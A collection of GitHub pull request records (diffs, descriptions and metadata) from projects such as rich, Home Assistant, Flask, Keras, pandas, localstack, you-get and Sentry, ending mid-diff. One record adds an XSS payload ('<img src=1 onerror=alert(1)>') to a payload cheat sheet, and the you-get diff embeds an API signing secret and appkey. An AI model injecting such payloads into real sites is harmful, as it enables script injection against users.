También puede usar la [Handler class](https://rich.readthedocs.io/en/latest/logging.html) incorporada para formatear y colorear la salida del módulo de registro de Python. Aquí hay un ejemplo de la salida:
![Registro](https://github.com/willmcgugan/rich/raw/master/imgs/logging.png)
+</details>
-## Emoji
+<details>
+<summary>Emoji</summary>
Para insertar un emoji en la salida de la consola, coloque el nombre entre dos puntos. He aquí un ejemplo:
@@ -139,8 +172,10 @@ Para insertar un emoji en la salida de la consola, coloque el nombre entre dos p
```
Utilice esta función con prudencia.
+</details>
-## Tablas
+<details>
+<summary>Tablas</summary>
Rich puede renderizar [tablas](https://rich.readthedocs.io/en/latest/tables.html) flexibles con caracteres de cuadro Unicode. Existe una gran variedad de opciones de formato para bordes, estilos, alineación de celdas, etc.
@@ -190,7 +225,10 @@ La clase `Table` es lo suficientemente inteligente como para cambiar el tamaño
![table2](https://github.com/willmcgugan/rich/raw/master/imgs/table2.png)
-## Barras de progreso
+</details>
+
+<details>
+<summary>Barras de progreso</summary>
Rich puede representar varias barras de [progreso](https://rich.readthedocs.io/en/latest/progress.html) sin parpadeos para realizar un seguimiento de las tareas de larga duración.
@@ -213,7 +251,10 @@ Las columnas pueden configurarse para mostrar los detalles que desee. Las column
Para probar esto usted mismo, consulte [examples/downloader.py](https://github.com/willmcgugan/rich/blob/master/examples/downloader.py) que puede descargar varias URL simultáneamente mientras muestra el progreso.
-## Estado
+</details>
+
+<details>
+<summary>Estado</summary>
Para situaciones en las que es difícil calcular el progreso, puede utilizar el método [status](https://rich.readthedocs.io/en/latest/reference/console.html#rich.console.Console.status) que mostrará una animación y un mensaje de "spinner". La animación no le impedirá usar la consola con normalidad. He aquí un ejemplo:
@@ -245,7 +286,29 @@ El comando anterior genera la siguiente salida en la terminal:
![spinners](https://github.com/willmcgugan/rich/raw/master/imgs/spinners.gif)
-## Columnas
+</details>
+
+<details>
+<summary>Árbol</summary>
+
+Rich genera un [tree](https://rich.readthedocs.io/en/latest/tree.html) con líneas de guía. Un árbol es ideal para mostrar una estructura de archivos, o cualquier otro dato jerárquico.
+
+Las etiquetas del árbol pueden ser texto simple o cualquier otra cosa que Rich pueda mostar. Ejecuta lo siguiente para una demostración:
+
+```
+python -m rich.tree
+```
+
+Esto genera la siguiente salida:
+
+![markdown](https://github.com/willmcgugan/rich/raw/master/imgs/tree.png)
+
+Ver el ejemplo [tree.py](https://github.com/willmcgugan/rich/blob/master/examples/tree.py) para un script que muestra una vista de árbol de cualquier directorio, similar a el comando de linux `tree`.
+
+</details>
+
+<details>
+<summary>Columnas</summary>
Rich puede representar contenido en [columnas](https://rich.readthedocs.io/en/latest/columns.html) ordenadas con un ancho igual u óptimo. Aquí hay un clon muy básico del comando (MacOS / Linux) `ls` que muestra una lista de directorios en columnas:
@@ -264,7 +327,10 @@ La siguiente captura de pantalla es el resultado del [ejemplo de columnas](https
![columns](https://github.com/willmcgugan/rich/raw/master/imgs/columns.png)
-## Markdown
+</details>
+
+<details>
+<summary>Markdown</summary>
Rich puede renderizar [markdown](https://rich.readthedocs.io/en/latest/markdown.html) y hace un trabajo razonable al traducir el formato al terminal.
@@ -284,7 +350,10 @@ Esto producirá una salida similar a la siguiente:
![markdown](https://github.com/willmcgugan/rich/raw/master/imgs/markdown.png)
-## Resaltado de sintaxis
+</details>
+
+<details>
+<summary>Resaltado de sintaxis</summary>
Rich usa el paquete [pygments](https://pygments.org/) para implementar [resaltado de sintaxis](https://rich.readthedocs.io/en/latest/syntax.html). El uso es similar a renderizar markdown; construya un objeto `Syntax` e imprímalo en la consola. He aquí un ejemplo:
@@ -316,7 +385,10 @@ Esto producirá el siguiente resultado:
![syntax](https://github.com/willmcgugan/rich/raw/master/imgs/syntax.png)
-## Tracebacks
+</details>
+
+<details>
+<summary>Tracebacks</summary>
Rich puede representar [tracebacks hermosos](https://rich.readthedocs.io/en/latest/traceback.html) que son más fáciles de leer y muestran más código que los tracebacks estándar de Python. Puede configurar Rich como el controlador tracebacks predeterminado para que todas las excepciones sin capturar sean procesadas por Rich.
@@ -324,6 +396,8 @@ Así es como se ve en OSX (similar en Linux):
![traceback](https://github.com/willmcgugan/rich/raw/master/imgs/traceback.png)
+</details>
+
## Proyecto usando Rich
Aquí hay algunos proyectos que usan Rich:
| ## Type of changes
- [ ] Bug fix
- [ ] New feature
- [x] Documentation / docstrings
- [ ] Tests
- [ ] Other
## Checklist
- [x] I've run the latest [black](https://github.com/psf/black) with default args on new code.
- [ ] I've updated CHANGELOG.md and CONTRIBUTORS.md where appropriate.
- [ ] I've added tests for new code.
- [x] I accept that @willmcgugan may be pedantic in the code review.
## Description
Update README.es.md adding collapsable sections and other seccions to Spanish | https://api.github.com/repos/Textualize/rich/pulls/1034 | 2021-02-21T00:21:53Z | 2021-02-21T15:52:39Z | 2021-02-21T15:52:39Z | 2021-02-21T15:52:39Z | 2,080 | Textualize/rich | 47,971 |
Empty traceback frames | diff --git a/CHANGELOG.md b/CHANGELOG.md
index 0fac4a287..1897c96c1 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -16,6 +16,7 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
- Use `Console(stderr=True)` in `rich.traceback.install` to support io redirection.
- Fixes superfluous spaces in html output https://github.com/Textualize/rich/issues/2832
- Fixed duplicate output in Jupyter https://github.com/Textualize/rich/pulls/2804
+- Fixes traceback failing when a frame filename is unreadable https://github.com/Textualize/rich/issues/2821
### Added
diff --git a/rich/syntax.py b/rich/syntax.py
index d732a2bf0..cc0660c23 100644
--- a/rich/syntax.py
+++ b/rich/syntax.py
@@ -494,7 +494,10 @@ def tokens_to_spans() -> Iterable[Tuple[str, Optional[Style]]]:
# Skip over tokens until line start
while line_no < _line_start:
- _token_type, token = next(tokens)
+ try:
+ _token_type, token = next(tokens)
+ except StopIteration:
+ break
yield (token, None)
if token.endswith("\n"):
line_no += 1
@@ -671,6 +674,8 @@ def _get_syntax(
line_offset = max(0, start_line - 1)
lines: Union[List[Text], Lines] = text.split("\n", allow_blank=ends_on_nl)
if self.line_range:
+ if line_offset > len(lines):
+ return
lines = lines[line_offset:end_line]
if self.indent_guides and not options.ascii_only:
diff --git a/rich/text.py b/rich/text.py
index 9c6bda26b..6c39cfa61 100644
--- a/rich/text.py
+++ b/rich/text.py
@@ -53,11 +53,7 @@ class Span(NamedTuple):
"""Style associated with the span."""
def __repr__(self) -> str:
- return (
- f"Span({self.start}, {self.end}, {self.style!r})"
- if (isinstance(self.style, Style) and self.style._meta)
- else f"Span({self.start}, {self.end}, {self.style!r})"
- )
+ return f"Span({self.start}, {self.end}, {self.style!r})"
def __bool__(self) -> bool:
return self.end > self.start
diff --git a/rich/traceback.py b/rich/traceback.py
index eb0a7a923..341f7f411 100644
--- a/rich/traceback.py
+++ b/rich/traceback.py
@@ -342,6 +342,7 @@ def from_exception(
locals_hide_dunder=locals_hide_dunder,
locals_hide_sunder=locals_hide_sunder,
)
+
return cls(
rich_traceback,
width=width,
@@ -663,7 +664,13 @@ def render_locals(frame: Frame) -> Iterable[ConsoleRenderable]:
style="pygments.text",
)
else:
- text = Text.assemble("in ", (frame.name, "pygments.function"))
+ text = Text.assemble(
+ "in ",
+ (frame.name, "pygments.function"),
+ (":", "pygments.text"),
+ (str(frame.lineno), "pygments.number"),
+ style="pygments.text",
+ )
if not frame.filename.startswith("<") and not first:
yield ""
yield text
@@ -673,6 +680,10 @@ def render_locals(frame: Frame) -> Iterable[ConsoleRenderable]:
if not suppressed:
try:
code = read_code(frame.filename)
+ if not code:
+ # code may be an empty string if the file doesn't exist, OR
+ # if the traceback filename is generated dynamically
+ continue
lexer_name = self._guess_lexer(frame.filename, code)
syntax = Syntax(
code,
| Fixes https://github.com/Textualize/rich/issues/2821 | https://api.github.com/repos/Textualize/rich/pulls/2850 | 2023-03-04T14:29:48Z | 2023-03-04T14:35:32Z | 2023-03-04T14:35:31Z | 2023-03-04T14:35:33Z | 945 | Textualize/rich | 48,295 |
Cleanup camera after late PR review | diff --git a/homeassistant/components/camera/__init__.py b/homeassistant/components/camera/__init__.py
index afc6be481448e8..e5ccb4339753fd 100644
--- a/homeassistant/components/camera/__init__.py
+++ b/homeassistant/components/camera/__init__.py
@@ -893,10 +893,11 @@ async def websocket_update_prefs(
entity_id = changes.pop("entity_id")
try:
entity_prefs = await prefs.async_update(entity_id, **changes)
- connection.send_result(msg["id"], entity_prefs)
except HomeAssistantError as ex:
_LOGGER.error("Error setting camera preferences: %s", ex)
connection.send_error(msg["id"], "update_failed", str(ex))
+ else:
+ connection.send_result(msg["id"], entity_prefs)
async def async_handle_snapshot_service(
diff --git a/homeassistant/components/camera/prefs.py b/homeassistant/components/camera/prefs.py
index effc2f619bd5f6..1107da2ba385ff 100644
--- a/homeassistant/components/camera/prefs.py
+++ b/homeassistant/components/camera/prefs.py
@@ -68,7 +68,8 @@ async def async_update(
) -> dict[str, bool | int]:
"""Update camera preferences.
- Returns a dict with the preferences on success or a string on error.
+ Returns a dict with the preferences on success.
+ Raises HomeAssistantError on failure.
"""
if preload_stream is not UNDEFINED:
# Prefs already initialized.
| ## Proposed change
<!--
Describe the big picture of your changes here to communicate to the
maintainers why we should accept this pull request. If it fixes a bug
or resolves a feature request, be sure to link to that issue in the
additional information section.
-->
This PR is a minor cleanup of #77439.
It moves one line out of a try block and edits one comment to update the return type.
## Type of change
<!--
What type of change does your PR introduce to Home Assistant?
NOTE: Please, check only 1! box!
If your PR requires multiple boxes to be checked, you'll most likely need to
split it into multiple PRs. This makes things easier and faster to code review.
-->
- [ ] Dependency upgrade
- [ ] Bugfix (non-breaking change which fixes an issue)
- [ ] New integration (thank you!)
- [ ] New feature (which adds functionality to an existing integration)
- [ ] Deprecation (breaking change to happen in the future)
- [ ] Breaking change (fix/feature causing existing functionality to break)
- [x] Code quality improvements to existing code or addition of tests
## Additional information
<!--
Details are important, and help maintainers processing your PR.
Please be sure to fill out additional details, if applicable.
-->
- This PR fixes or closes issue: fixes #
- This PR is related to issue:
- Link to documentation pull request:
## Checklist
<!--
Put an `x` in the boxes that apply. You can also fill these out after
creating the PR. If you're unsure about any of them, don't hesitate to ask.
We're here to help! This is simply a reminder of what we are going to look
for before merging your code.
-->
- [ ] The code change is tested and works locally.
- [ ] Local tests pass. **Your PR cannot be merged unless tests pass**
- [ ] There is no commented out code in this PR.
- [ ] I have followed the [development checklist][dev-checklist]
- [ ] The code has been formatted using Black (`black --fast homeassistant tests`)
- [ ] Tests have been added to verify that the new code works.
If user exposed functionality or configuration variables are added/changed:
- [ ] Documentation added/updated for [www.home-assistant.io][docs-repository]
If the code communicates with devices, web services, or third-party tools:
- [ ] The [manifest file][manifest-docs] has all fields filled out correctly.
Updated and included derived files by running: `python3 -m script.hassfest`.
- [ ] New or updated dependencies have been added to `requirements_all.txt`.
Updated by running `python3 -m script.gen_requirements_all`.
- [ ] For the updated dependencies - a link to the changelog, or at minimum a diff between library versions is added to the PR description.
- [ ] Untested files have been added to `.coveragerc`.
The integration reached or maintains the following [Integration Quality Scale][quality-scale]:
<!--
The Integration Quality Scale scores an integration on the code quality
and user experience. Each level of the quality scale consists of a list
of requirements. We highly recommend getting your integration scored!
-->
- [ ] No score or internal
- [ ] 🥈 Silver
- [ ] 🥇 Gold
- [ ] 🏆 Platinum
<!--
This project is very active and we have a high turnover of pull requests.
Unfortunately, the number of incoming pull requests is higher than what our
reviewers can review and merge so there is a long backlog of pull requests
waiting for review. You can help here!
By reviewing another pull request, you will help raise the code quality of
that pull request and the final review will be faster. This way the general
pace of pull request reviews will go up and your wait time will go down.
When picking a pull request to review, try to choose one that hasn't yet
been reviewed.
Thanks for helping out!
-->
To help with the load of incoming pull requests:
- [ ] I have reviewed two other [open pull requests][prs] in this repository.
[prs]: https://github.com/home-assistant/core/pulls?q=is%3Aopen+is%3Apr+-author%3A%40me+-draft%3Atrue+-label%3Awaiting-for-upstream+sort%3Acreated-desc+review%3Anone+-status%3Afailure
<!--
Thank you for contributing <3
Below, some useful links you could explore:
-->
[dev-checklist]: https://developers.home-assistant.io/docs/en/development_checklist.html
[manifest-docs]: https://developers.home-assistant.io/docs/en/creating_integration_manifest.html
[quality-scale]: https://developers.home-assistant.io/docs/en/next/integration_quality_scale_index.html
[docs-repository]: https://github.com/home-assistant/home-assistant.io
| https://api.github.com/repos/home-assistant/core/pulls/77880 | 2022-09-06T08:40:46Z | 2022-09-06T10:33:21Z | 2022-09-06T10:33:21Z | 2022-09-07T11:01:58Z | 339 | home-assistant/core | 39,439 |
Update README.md | diff --git a/XSS Injection/README.md b/XSS Injection/README.md
index 2bc8e6a0d5..b53044e4a2 100644
--- a/XSS Injection/README.md
+++ b/XSS Injection/README.md
@@ -250,6 +250,7 @@ Most tools are also suitable for blind XSS attacks:
<img src=x:alert(alt) onerror=eval(src) alt=xss>
"><img src=x onerror=alert('XSS');>
"><img src=x onerror=alert(String.fromCharCode(88,83,83));>
+<><img src=1 onerror=alert(1)>
// Svg payload
<svgonload=alert(1)>
| new img payload | https://api.github.com/repos/swisskyrepo/PayloadsAllTheThings/pulls/693 | 2023-11-01T15:32:46Z | 2023-11-12T17:20:39Z | 2023-11-12T17:20:39Z | 2023-11-12T17:20:39Z | 159 | swisskyrepo/PayloadsAllTheThings | 8,405 |
document `Flask.register_blueprint` arguments | diff --git a/flask/app.py b/flask/app.py
index a6e4f18f5d..ece1e2bfdb 100644
--- a/flask/app.py
+++ b/flask/app.py
@@ -995,21 +995,39 @@ def make_null_session(self):
@setupmethod
def register_blueprint(self, blueprint, **options):
- """Registers a blueprint on the application.
+ """Register a :class:`~flask.Blueprint` on the application. Keyword
+ arguments passed to this method will override the defaults set on the
+ blueprint.
+
+ Calls the blueprint's :meth:`~flask.Blueprint.register` method after
+ recording the blueprint in the application's :attr:`blueprints`.
+
+ :param blueprint: The blueprint to register.
+ :param url_prefix: Blueprint routes will be prefixed with this.
+ :param subdomain: Blueprint routes will match on this subdomain.
+ :param url_defaults: Blueprint routes will use these default values for
+ view arguments.
+ :param options: Additional keyword arguments are passed to
+ :class:`~flask.blueprints.BlueprintSetupState`. They can be
+ accessed in :meth:`~flask.Blueprint.record` callbacks.
.. versionadded:: 0.7
"""
first_registration = False
+
if blueprint.name in self.blueprints:
- assert self.blueprints[blueprint.name] is blueprint, \
- 'A blueprint\'s name collision occurred between %r and ' \
- '%r. Both share the same name "%s". Blueprints that ' \
- 'are created on the fly need unique names.' % \
- (blueprint, self.blueprints[blueprint.name], blueprint.name)
+ assert self.blueprints[blueprint.name] is blueprint, (
+ 'A name collision occurred between blueprints %r and %r. Both'
+ ' share the same name "%s". Blueprints that are created on the'
+ ' fly need unique names.' % (
+ blueprint, self.blueprints[blueprint.name], blueprint.name
+ )
+ )
else:
self.blueprints[blueprint.name] = blueprint
self._blueprint_order.append(blueprint)
first_registration = True
+
blueprint.register(self, options, first_registration)
def iter_blueprints(self):
diff --git a/flask/blueprints.py b/flask/blueprints.py
index ed51094e53..80668dbef8 100644
--- a/flask/blueprints.py
+++ b/flask/blueprints.py
@@ -159,18 +159,25 @@ def make_setup_state(self, app, options, first_registration=False):
return BlueprintSetupState(self, app, options, first_registration)
def register(self, app, options, first_registration=False):
- """Called by :meth:`Flask.register_blueprint` to register a blueprint
- on the application. This can be overridden to customize the register
- behavior. Keyword arguments from
- :func:`~flask.Flask.register_blueprint` are directly forwarded to this
- method in the `options` dictionary.
+ """Called by :meth:`Flask.register_blueprint` to register all views
+ and callbacks registered on the blueprint with the application. Creates
+ a :class:`.BlueprintSetupState` and calls each :meth:`record` callback
+ with it.
+
+ :param app: The application this blueprint is being registered with.
+ :param options: Keyword arguments forwarded from
+ :meth:`~Flask.register_blueprint`.
+ :param first_registration: Whether this is the first time this
+ blueprint has been registered on the application.
"""
self._got_registered_once = True
state = self.make_setup_state(app, options, first_registration)
+
if self.has_static_folder:
- state.add_url_rule(self.static_url_path + '/<path:filename>',
- view_func=self.send_static_file,
- endpoint='static')
+ state.add_url_rule(
+ self.static_url_path + '/<path:filename>',
+ view_func=self.send_static_file, endpoint='static'
+ )
for deferred in self.deferred_functions:
deferred(state)
| closes #1809
| https://api.github.com/repos/pallets/flask/pulls/2371 | 2017-06-14T14:18:26Z | 2017-06-14T14:41:44Z | 2017-06-14T14:41:44Z | 2020-11-14T02:42:47Z | 925 | pallets/flask | 20,012 |
Fix predict_generator output shape for multi-output models when batch size is larger than the dataset. | diff --git a/keras/engine/training.py b/keras/engine/training.py
index 2e1ef097433..59e5a474704 100644
--- a/keras/engine/training.py
+++ b/keras/engine/training.py
@@ -2445,6 +2445,6 @@ def predict_generator(self, generator, steps=None,
else:
return np.concatenate(all_outs[0])
if steps_done == 1:
- return [out for out in all_outs]
+ return [out[0] for out in all_outs]
else:
return [np.concatenate(out) for out in all_outs]
diff --git a/tests/keras/engine/test_training.py b/tests/keras/engine/test_training.py
index 6cda6c4c5f7..376c762da09 100644
--- a/tests/keras/engine/test_training.py
+++ b/tests/keras/engine/test_training.py
@@ -22,11 +22,12 @@
class RandomSequence(Sequence):
- def __init__(self, batch_size):
+ def __init__(self, batch_size, sequence_length=12):
self.batch_size = batch_size
+ self.sequence_length = sequence_length
def __len__(self):
- return 12
+ return self.sequence_length
def __getitem__(self, idx):
return [np.random.random((self.batch_size, 3)), np.random.random((self.batch_size, 3))], [
@@ -410,6 +411,46 @@ def gen_data():
initial_epoch=0, validation_data=gen_data(),
callbacks=[tracker_cb])
+ # predict_generator output shape behavior should be consistent
+ def expected_shape(batch_size, n_batches):
+ return (batch_size * n_batches, 4), (batch_size * n_batches, 3)
+
+ # Multiple outputs and one step.
+ batch_size = 5
+ sequence_length = 1
+ shape_0, shape_1 = expected_shape(batch_size, sequence_length)
+ out = model.predict_generator(RandomSequence(batch_size,
+ sequence_length=sequence_length))
+ assert np.shape(out[0]) == shape_0 and np.shape(out[1]) == shape_1
+
+ # Multiple outputs and multiple steps.
+ batch_size = 5
+ sequence_length = 2
+ shape_0, shape_1 = expected_shape(batch_size, sequence_length)
+ out = model.predict_generator(RandomSequence(batch_size,
+ sequence_length=sequence_length))
+ assert np.shape(out[0]) == shape_0 and np.shape(out[1]) == shape_1
+
+ # Create a model with a single output.
+ single_output_model = Model([a, b], a_2)
+ single_output_model.compile(optimizer, loss, metrics=[], sample_weight_mode=None)
+
+ # Single output and one step.
+ batch_size = 5
+ sequence_length = 1
+ shape_0, _ = expected_shape(batch_size, sequence_length)
+ out = single_output_model.predict_generator(RandomSequence(batch_size,
+ sequence_length=sequence_length))
+ assert np.shape(out) == shape_0
+
+ # Single output and multiple steps.
+ batch_size = 5
+ sequence_length = 2
+ shape_0, _ = expected_shape(batch_size, sequence_length)
+ out = single_output_model.predict_generator(RandomSequence(batch_size,
+ sequence_length=sequence_length))
+ assert np.shape(out) == shape_0
+
@pytest.mark.skipif(sys.version_info < (3,), reason='Cannot catch warnings in python 2')
@keras_test
| For a multi-output model, if a data generator's batch size is larger than the data set size, predict_generator's output shape is incorrect.
For example:
* I have a data generator with batch_size=64.
* There are 50 samples in my data set.
* My model is multi-output with 5 outputs containing 3 classes per output.
This scenario will reach [L2448 in training.py](https://github.com/keras-team/keras/blob/master/keras/engine/training.py#L2448):
```
if steps_done == 1:
return [out for out in all_outs]
else:
return [np.concatenate(out) for out in all_outs]
```
Because the batch_size is larger than the data set, steps_done will be equal to 1.
The result will be of shape (5, 1, 50, 3) because `[out for out in all_outs]` doesn't change the output shape. This differs from the case where the batch size is less than the dataset size. In that case the result will be (5, 50, 3) due to `[np.concatenate(out) for out in all_outs]`.
I'm proposing the following fix:
`return [out[0] for out in all_outs]`
This will convert the (5, 1, 50, 3) to the expected (5, 50, 3).
*****
Edit: It seems like another solution would be to change
```
if steps_done == 1:
return [out for out in all_outs]
else:
return [np.concatenate(out) for out in all_outs]
```
to a single return statement:
```
return [np.concatenate(out) for out in all_outs]
``` | https://api.github.com/repos/keras-team/keras/pulls/8795 | 2017-12-15T03:16:58Z | 2017-12-15T21:32:38Z | 2017-12-15T21:32:38Z | 2017-12-15T21:32:38Z | 813 | keras-team/keras | 47,141 |
Backport PR #32746: DOC: start 1.0.3 | diff --git a/doc/source/whatsnew/index.rst b/doc/source/whatsnew/index.rst
index 76d13478612ee..6764fbd736d46 100644
--- a/doc/source/whatsnew/index.rst
+++ b/doc/source/whatsnew/index.rst
@@ -16,9 +16,10 @@ Version 1.0
.. toctree::
:maxdepth: 2
- v1.0.0
- v1.0.1
+ v1.0.3
v1.0.2
+ v1.0.1
+ v1.0.0
Version 0.25
------------
diff --git a/doc/source/whatsnew/v1.0.2.rst b/doc/source/whatsnew/v1.0.2.rst
index d3921271264c2..cfa3ee6acc29d 100644
--- a/doc/source/whatsnew/v1.0.2.rst
+++ b/doc/source/whatsnew/v1.0.2.rst
@@ -123,4 +123,4 @@ Bug fixes
Contributors
~~~~~~~~~~~~
-.. contributors:: v1.0.1..v1.0.2|HEAD
+.. contributors:: v1.0.1..v1.0.2
diff --git a/doc/source/whatsnew/v1.0.3.rst b/doc/source/whatsnew/v1.0.3.rst
new file mode 100644
index 0000000000000..17f1bdc365518
--- /dev/null
+++ b/doc/source/whatsnew/v1.0.3.rst
@@ -0,0 +1,27 @@
+
+.. _whatsnew_103:
+
+What's new in 1.0.3 (March ??, 2020)
+------------------------------------
+
+These are the changes in pandas 1.0.3. See :ref:`release` for a full changelog
+including other versions of pandas.
+
+{{ header }}
+
+.. ---------------------------------------------------------------------------
+
+.. _whatsnew_103.regressions:
+
+Fixed regressions
+~~~~~~~~~~~~~~~~~
+
+.. _whatsnew_103.bug_fixes:
+
+Bug fixes
+~~~~~~~~~
+
+Contributors
+~~~~~~~~~~~~
+
+.. contributors:: v1.0.2..v1.0.3|HEAD
| https://github.com/pandas-dev/pandas/pull/32746 | https://api.github.com/repos/pandas-dev/pandas/pulls/32750 | 2020-03-16T13:23:59Z | 2020-03-16T14:34:52Z | 2020-03-16T14:34:52Z | 2020-03-16T14:34:53Z | 545 | pandas-dev/pandas | 45,152 |
update toml for code hierarchy | diff --git a/llama-index-packs/llama-index-packs-code-hierarchy/pyproject.toml b/llama-index-packs/llama-index-packs-code-hierarchy/pyproject.toml
index b5928b7070f4d..b4c268d598432 100644
--- a/llama-index-packs/llama-index-packs-code-hierarchy/pyproject.toml
+++ b/llama-index-packs/llama-index-packs-code-hierarchy/pyproject.toml
@@ -8,10 +8,12 @@ check-hidden = true
skip = "*.csv,*.html,*.json,*.jsonl,*.pdf,*.txt,*.ipynb"
[tool.llamahub]
-classes = ["CodeHierarchyPack"]
-contains_example = true
+contains_example = false
import_path = "llama_index.packs.code_hierarchy"
+[tool.llamahub.class_authors]
+CodeHierarchyAgentPack = "ryanpeach"
+
[tool.mypy]
disallow_untyped_defs = true
exclude = ["_static", "build", "examples", "notebooks", "venv"]
@@ -26,7 +28,7 @@ license = "MIT"
maintainers = ["ryanpeach"]
name = "llama-index-packs-code-hierarchy"
readme = "README.md"
-version = "0.1.0"
+version = "0.1.1"
[tool.poetry.dependencies]
python = ">=3.8.1,<3.12"
| https://api.github.com/repos/run-llama/llama_index/pulls/11776 | 2024-03-08T16:12:27Z | 2024-03-08T16:40:24Z | 2024-03-08T16:40:24Z | 2024-03-08T16:40:25Z | 329 | run-llama/llama_index | 5,999 |
|
Fix:restore deep archive object | diff --git a/localstack/services/s3/s3_starter.py b/localstack/services/s3/s3_starter.py
index 154feffd0e5da..adb027a30f04d 100644
--- a/localstack/services/s3/s3_starter.py
+++ b/localstack/services/s3/s3_starter.py
@@ -181,7 +181,8 @@ def s3_key_response_get(self, bucket_name, query, key_name, headers, *args, **kw
resp_status, resp_headers, resp_value = s3_key_response_get_orig(
bucket_name, query, key_name, headers, *args, **kwargs
)
- if resp_headers.get('x-amz-storage-class') == 'DEEP_ARCHIVE':
+
+ if resp_headers.get('x-amz-storage-class') == 'DEEP_ARCHIVE' and not resp_headers.get('x-amz-restore'):
raise InvalidObjectState()
return resp_status, resp_headers, resp_value
diff --git a/tests/integration/test_s3.py b/tests/integration/test_s3.py
index 960e0b3f357b7..ed69727ee9a51 100644
--- a/tests/integration/test_s3.py
+++ b/tests/integration/test_s3.py
@@ -1348,6 +1348,51 @@ def test_s3_get_deep_archive_object(self):
# clean up
self._delete_bucket(bucket_name, [object_key])
+ def test_s3_get_deep_archive_object_restore(self):
+ bucket_name = 'bucket-%s' % short_uid()
+ object_key = 'key-%s' % short_uid()
+
+ self.s3_client.create_bucket(Bucket=bucket_name)
+
+ # put DEEP_ARCHIVE object
+ self.s3_client.put_object(
+ Bucket=bucket_name,
+ Key=object_key,
+ Body='body data',
+ StorageClass='DEEP_ARCHIVE'
+ )
+
+ with self.assertRaises(ClientError) as ctx:
+ self.s3_client.get_object(
+ Bucket=bucket_name,
+ Key=object_key
+ )
+
+ self.assertIn('InvalidObjectState', str(ctx.exception))
+
+ # put DEEP_ARCHIVE object
+ self.s3_client.restore_object(
+ Bucket=bucket_name,
+ Key=object_key,
+ RestoreRequest={
+ 'Days': 30,
+ 'GlacierJobParameters': {
+ 'Tier': 'Bulk'
+ },
+ 'Tier': 'Bulk',
+ },
+ )
+
+ response = self.s3_client.get_object(
+ Bucket=bucket_name,
+ Key=object_key
+ )
+
+ self.assertIn('etag', response.get('ResponseMetadata').get('HTTPHeaders'))
+
+ # clean up
+ self._delete_bucket(bucket_name, [object_key])
+
def test_encoding_notification_messages(self):
key = 'a@b'
bucket_name = 'notif-enc-%s' % short_uid()
|
Fix:restore deep archive object | https://api.github.com/repos/localstack/localstack/pulls/3536 | 2021-01-30T19:51:00Z | 2021-01-31T00:04:05Z | 2021-01-31T00:04:05Z | 2021-01-31T00:04:05Z | 656 | localstack/localstack | 28,985 |
fix bilibili format | diff --git a/src/you_get/extractors/bilibili.py b/src/you_get/extractors/bilibili.py
index 7e5bdb37da..d23bbe5c87 100644
--- a/src/you_get/extractors/bilibili.py
+++ b/src/you_get/extractors/bilibili.py
@@ -28,7 +28,8 @@ class Bilibili(VideoExtractor):
live_room_init_api_url = 'https://api.live.bilibili.com/room/v1/Room/room_init?id={}'
live_room_info_api_url = 'https://api.live.bilibili.com/room/v1/Room/get_info?room_id={}'
- SEC1 = '1c15888dc316e05a15fdd0a02ed6584f'
+ #SEC1 = '1c15888dc316e05a15fdd0a02ed6584f'
+ SEC1 = '94aba54af9065f71de72f5508f1cd42e'
SEC2 = '9b288147e5474dd2aa67085f716c560d'
stream_types = [
{'id': 'hdflv'},
@@ -44,7 +45,7 @@ class Bilibili(VideoExtractor):
@staticmethod
def bilibili_stream_type(urls):
url = urls[0]
- if 'hd.flv' in url or '-112.flv' in url:
+ if 'hd.flv' in url or '-80.flv' in url:
return 'hdflv', 'flv'
if '-64.flv' in url:
return 'flv720', 'flv'
@@ -59,7 +60,8 @@ def bilibili_stream_type(urls):
def api_req(self, cid, quality, bangumi, bangumi_movie=False, **kwargs):
ts = str(int(time.time()))
if not bangumi:
- params_str = 'cid={}&player=1&quality={}&ts={}'.format(cid, quality, ts)
+ #params_str = 'cid={}&player=1&quality={}&ts={}'.format(cid, quality, ts)
+ params_str = 'appkey=84956560bc028eb7&cid={}&otype=xml&qn={}&quality={}&type='.format(cid, quality, quality)
chksum = hashlib.md5(bytes(params_str+self.SEC1, 'utf8')).hexdigest()
api_url = self.api_url + params_str + '&sign=' + chksum
else:
@@ -97,7 +99,7 @@ def download_by_vid(self, cid, bangumi, **kwargs):
quality = 'hdflv' if bangumi else 'flv'
info_only = kwargs.get('info_only')
- for qlt in range(4, -1, -1):
+ for qlt in [116,112,80,74,64,32,16,15]:
api_xml = self.api_req(cid, qlt, bangumi, **kwargs)
self.parse_bili_xml(api_xml)
if not info_only or stream_id:
| update xml-url and sec1 to get all format of bilibili-video | https://api.github.com/repos/soimort/you-get/pulls/2593 | 2018-04-22T03:00:23Z | 2018-04-24T10:41:22Z | 2018-04-24T10:41:22Z | 2018-04-24T10:41:22Z | 686 | soimort/you-get | 21,376 |
Small improvement to docs | diff --git a/docs/appcontext.rst b/docs/appcontext.rst
index e9e1ad8f25..346cb09b64 100644
--- a/docs/appcontext.rst
+++ b/docs/appcontext.rst
@@ -44,8 +44,7 @@ you can have more than one application in the same Python process.
So how does the code find the “right” application? In the past we
recommended passing applications around explicitly, but that caused issues
-with libraries that were not designed with that in mind for libraries for
-which it was too inconvenient to make this work.
+with libraries that were not designed with that in mind.
A common workaround for that problem was to use the
:data:`~flask.current_app` proxy later on, which was bound to the current
diff --git a/docs/quickstart.rst b/docs/quickstart.rst
index e8b71ca98a..84ffb4889d 100644
--- a/docs/quickstart.rst
+++ b/docs/quickstart.rst
@@ -377,7 +377,7 @@ package it's actually inside your package:
/hello.html
For templates you can use the full power of Jinja2 templates. Head over
-to the the official `Jinja2 Template Documentation
+to the official `Jinja2 Template Documentation
<http://jinja.pocoo.org/2/documentation/templates>`_ for more information.
Here is an example template:
| https://api.github.com/repos/pallets/flask/pulls/562 | 2012-07-21T11:56:59Z | 2012-07-21T11:57:40Z | 2012-07-21T11:57:40Z | 2020-11-14T07:18:48Z | 316 | pallets/flask | 20,637 |
|
fix(crons): Fix re-opening closed check-ins on the consumer | diff --git a/src/sentry/monitors/consumers/monitor_consumer.py b/src/sentry/monitors/consumers/monitor_consumer.py
index ef498c3079c0a3..5d07b3bda98cae 100644
--- a/src/sentry/monitors/consumers/monitor_consumer.py
+++ b/src/sentry/monitors/consumers/monitor_consumer.py
@@ -171,6 +171,18 @@ def _process_message(wrapper: Dict) -> None:
monitor=monitor,
)
+ if check_in.status in CheckInStatus.FINISHED_VALUES:
+ metrics.incr(
+ "monitors.checkin.result",
+ tags={"source": "consumer", "status": "checkin_finished"},
+ )
+ logger.debug(
